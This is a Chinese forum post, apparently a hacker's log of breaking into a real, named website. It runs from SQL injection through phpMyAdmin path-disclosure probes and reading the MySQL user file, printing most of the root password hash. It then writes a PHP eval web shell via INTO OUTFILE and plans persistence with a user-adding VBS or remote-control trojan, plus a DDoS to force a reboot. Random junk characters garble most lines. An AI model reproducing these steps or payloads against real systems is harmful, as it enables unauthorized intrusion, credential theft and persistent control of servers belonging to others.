第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏
: s2 E5 c9 a. g; L发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3 -0 -1 判断后确认存在注入!
' x" v3 `2 q3 D& U t* h% t0 g! W# H+ s# s6 o% u& p
, A8 E, d! N- ^
' [( R3 S# k8 J! X3 G
常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限 8 y( U9 n1 N2 } O/ }" Y2 N# h* q
, j8 V* r) ]" c0 q1 a; |9 U5 {& B
那么想可以直接写入shell ,getshell有几个条件:
) Y! K/ i: |: ~# \2 H1、知道站点物理路径 2、有足够大的权限 3、magic_quotes_gpc()=OFF
) u) S5 e) M4 f5 y( e1 I
. ] ^7 z% }2 y1 s7 |试着爆绝对路径:
0 h4 y( ~: u6 Z" c! ]( S1./phpMyAdmin/index.php?lang[]=1 . E+ L5 [% I1 V* ~& f$ f
2./phpMyAdmin/phpinfo.php ' J# p6 L% j( g
3./load_file() # I+ t7 v: o$ L; s# S" A2 A
4./phpmyadmin/themes/darkblue_orange/layout.inc.php $ g4 o! l- B% j5 h0 o9 _: h1 y2 v3 [
5./phpmyadmin/libraries/select_lang.lib.php ! u; E4 V [! d1 \
6./phpmyadmin/libraries/lect_lang.lib.php
. }( z4 c2 a; `: F# C0 s7./phpmyadmin/libraries/mcrypt.lib.php
6 y' O0 b# m, O; \8./phpmyadmin/libraries/export/xls.php 7 R u$ ~- U1 z# S% |: N0 z
' E- K; a. t+ ~9 z& C# m% [4 K
均不行........................... + Y% [. i7 {& P* G' r! h
/ U( Y1 E) A) [御剑扫到这个: http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php 1 A# H8 \: c _2 N
7 T6 Z5 `4 \5 e; o% Q5 y# O9 T
权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin % L' J+ p% u9 R4 r3 X/ e
/ y" t0 v0 K0 Z) ?" W# U$ }默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败
% y6 |( z3 t4 E4 B9 u5 a/ r1 s) }8 V9 S2 l& \8 N5 d* _" M2 Y
敏感东西: http://202.103.49.66/Admincp.php 社工进不去........... 7 E7 k; O$ n1 ]! \$ y j9 R
- T/ m* d( O4 O- T( m" D
想想root还可以读,读到root密码进phpmyadmin 也可以拿shell : T9 x( K V- |8 \1 G" v
, J$ y4 d1 c8 H( w9 T- i8 shttp://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini + T1 h4 G" }* l7 E6 c
% p+ ~$ B+ H4 E9 I' h) Z8 D) U; }自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD , R/ G, c- l8 k; J. M+ y
2 e, @& P( D P; x6 R! m! F4 @3 e成功读到root密码:
/ k8 ~* f' o2 u" {. l
T! q4 O' u0 d7 Q ~17---- r(0072)
1 @' _# C9 o' m4 d18---- o(006f)
, \+ Q* D! D" I1 L19---- o(006f)
- u. l7 P# }+ D5 b% r& O; k20---- t(0074) ( ]; B# y$ m- {- l) f6 {3 k
21---- *(002a) ( ?# E. Q$ Q" `* c# s0 o
22---- 8(0038)
1 F7 E& G/ r7 ~% p7 m. p! j23---- 2(0032)
( P4 C3 l1 c5 C24---- E(0045)
& m: w- n# b4 j/ X: A0 z" v0 d# T# _( T25---- 1(0031) ( }" B3 ]& b5 H- y( E
26---- C(0043) 3 q% o: Y3 J0 n/ g5 A
27---- 5(0035)
) V2 T @& U [% _% w6 T/ [28---- 8(0038) $ |, Z5 I$ Q/ ^ s' r6 d1 a [- C
29---- 2(0032) 7 A; {: O# Y2 \/ ~, z1 H
30---- 8(0038)
; T j h1 q& N2 i; t& X31---- A(0041) ) `& B! j8 ?, U$ ^/ I8 x
32---- 9(0039) 7 K8 [* t! i- }9 |! G
33---- B(0042) . t2 ~: h/ K/ s8 R6 O0 o! t2 M% x
34---- 5(0035)
- k% \* Q' Y) {6 }! f. h35---- 4(0034) " T" W' w5 U, d% @9 D
36---- 8(0038) " G( W; Z Z% ]# n
37---- 6(0036) ( i e; x. A' f, b* ]0 x' }
38---- 4(0034) 9 B6 L/ Z, Q- Z# _, ?2 K9 q
39---- 9(0039) 0 _7 s$ W2 Q S- h
40---- 1(0031)
- D' y9 w- ~: q' n. d* @6 k41---- 1(0031) $ G) t. k" D. L% g
42---- 5(0035)
: X/ V. h1 i) n43---- 3(0033) * [+ g2 J) v, U5 S/ _% _
44---- 5(0035)
6 `8 b8 H# O, s: ?! J45---- 9(0039)
- O& ]; C7 v5 Q5 M46---- 8(0038) " r9 N1 {) O4 k+ {; s7 n3 v
47---- F(0046) ' Y" b: o2 Y* @2 X
48---- F(0046) 0 {0 A% O+ \; l6 b. R
49---- 4(0034) ; ~# X$ b8 o# a5 F9 u$ Y' S
50---- F(0046) . x4 V. Z: h1 d1 k, u
51---- 0(0030) ' b* I5 A* T3 O2 @8 X _
52---- 3(0033) + m0 {; A9 V# U, P1 I
53---- 2(0032) 6 t0 c1 O# B5 M
54---- A(0041) & m& O/ t( {6 q N& S2 X1 Z3 u
55---- 4(0034) 7 {) i* [' z9 Z8 i
56---- A(0041)
$ o! W/ N8 z0 O57---- B(0042)
, f5 A1 H! q8 B" w58---- *(0044)
9 d. F4 I8 j# Z6 N7 c/ _: U59---- *(0035)
4 ` T0 H5 L9 `% \. `4 [60---- *(0041) ! Q* F/ ^' K: X
61---- *0032)
4 z; A4 B) F: p( Z8 J) K0 }4 O& `3 p9 P% Y
解密后成功登陆phpmyamin
' }) E8 ^# m! J* S$ R4 i2 h + P+ J0 G( m7 a& p9 c
: j, I: m8 K' _$ F/ {
- R9 K, \1 W+ j; F
9 ?/ V6 H$ I, u2 j" Y
找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php' , q) k1 X3 F e- U* K6 U1 V
# a y3 N) V: N成功执行,拿下shell,菜刀连接: 1 b/ p/ U) W8 M$ P
1 V+ h( b' {# m' b5 k8 M {服务器不支持asp,aspx,php提权无果...................
/ |. V* j0 Q* Q8 X+ \
' U- p' q3 O6 | ^! S3 l) g但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:
. r( ]6 o) C! M! @服务器上已经有个隐藏帐号了 - U: ~7 o6 J R+ E" ~2 h
别名 administrators* v: n' b% ?: \: q% x6 V: r7 W
注释 管理员对计算机/域有不受限制的完全访问权 * |5 Y- z4 u( u3 }3 M- I
成员 5 @1 ~. E5 F! f) M2 u* k: c
-------------------------------------------------------------------------------0 F, [; ]. r% C+ n
admin
+ C8 k' z& b$ P, Q3 gAdministrator2 H2 _5 T$ t$ y7 x6 t5 r
slipper$6 n. I$ g- u" b
sqluser
8 N. H9 j: P+ j8 P6 n命令成功完成。
- J, _* l7 S X5 n' C# B
9 B& `0 A4 A; L+ C8 g) U, i! N) _! v1 Y服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。' G+ K. R+ D4 p1 Y l( ~: i# D, N
x& O' o8 y; d# q
ddos服务器重启,不然就只能坐等服务器重启了...............................
3 k* w8 F- Q$ @5 P' Y: g- z- c. j& P" U) K, ~8 p2 f" y3 y; _
Z2 J: \! J' n- K1 Q" | W |